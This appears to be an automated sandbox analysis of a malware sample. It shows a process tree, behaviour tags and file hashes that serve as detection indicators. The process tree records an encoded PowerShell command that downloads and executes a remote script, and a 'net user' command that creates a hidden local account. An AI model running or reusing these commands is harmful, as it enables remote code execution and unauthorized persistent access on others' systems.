C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:868
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:3944
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:3288
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1196
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:372
-
-
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵PID:3048
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵PID:2240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵PID:1916
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
e75bccdf363f6902a0bb91ffe6e05056
SHA18465a95edbd183b2084d63ec0c2bba1e549c39ac
SHA256c49367b064eac51e2210a72585f8c903f468bdf8f1debed20f4b5516cfec8cad
SHA51244bdafd9c8d3655bac610455ff7e4b7e88eda5bf67718cf8f72c10a8e1ca47e9d7ca760e29c61b8513698a15933b15e6bc34c6b9cac4d40607687609a7aea199
-
MD5
cffbd3c113b5ad3e1152e1d47351aba7
SHA14eff0096a4ab76fb115c94c221707d221d59bf53
SHA2564a7fb9172f8759a241c0d56297704df22b5e88b40002b816116d252b599f4ecc
SHA512e4a4615ddcb165ff409f031999d0dc8254176811fb81826c16585f88cda5df70b6f3c84b055db757de40864f546a1ea04a5daeb11f2fcf2e20f727da62b4e7a1
-
MD5
1ef6eef1d39c71661339d818226d688d
SHA1b3e44163a9d9894d091f59f888d7d5d90e68e216
SHA256dcad3e3226ea222782284a604f9354ac661cf6e34c26c62162dd1aeedfbef04a
SHA5128deb2b6df79c2ce81604b9124d92c6222f517cea021416513fdd8dfc9f8d46ae464cd69f50ee70a343cfe5b4fbc4d08212bcf3e1416262193cae52b4a30b2c49
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
0fd306c72f2b4993966ce5cf8a5dd10b
SHA164b0c2355fbfdcc756738704bdf6d4c25daf7c91
SHA256bd6990917973d12228ae7221446686633e8cc5a902fb9c7ae66214c3200ed3f9
SHA51234a71f2f1d6123d01771767d2377ceeeb77bfddc239ee59edcdce32a119d86a541fa21d2364d2e702ecf58b8a858869b6d77ee917f2ed40481200ac2a4e97da6
-
MD5
09e18798f9888787929079faecb5d58e
SHA11742950dc167c3bdc25f780346a6b6db402b5e9b
SHA2569c495abb0ad22a304a4ff2701bb2191f48ea5c8903bfc8a1bd2105559ee36096
SHA512c2d2cd30237cb4e9ae43e794f8b08f1ebbf2b4a246ce77b59f32812aad6143e43e12e742833451dcd90c220dc0433ea50b291119fc94a875b8e46f177bc9e93e
-
MD5
44161e115bf968d5b616d254be2f38a1
SHA1b801a9318b1fc89996f76055c69e071e0fed368a
SHA2562750122708b726eb5e75869401dc6f3b663e8ca342924f8a713adfca86e80491
SHA512375ab2fd36f9953faef09e10889535a0e8a5192c841d941998ff0f193d5b6702a26698149789f77925689c74edecb97a78382c2d2529c6ab10a47b723d3a185e
-
MD5
7245ed7533b89d29f7f5bb35830d4560
SHA18efaef0babf855989e460451803032940ae0c7bd
SHA25689549afa855d70f7bf33b1979541ab0e732c7cc16adb866efffe9d1e8be62638
SHA512f19a1a72684cc54757d065133dd95122acce69744267fa49a55a5508263946953ad8bca4e2e3188e02a119948dac95a63c185d92c57f32dad51bfaa077a216f3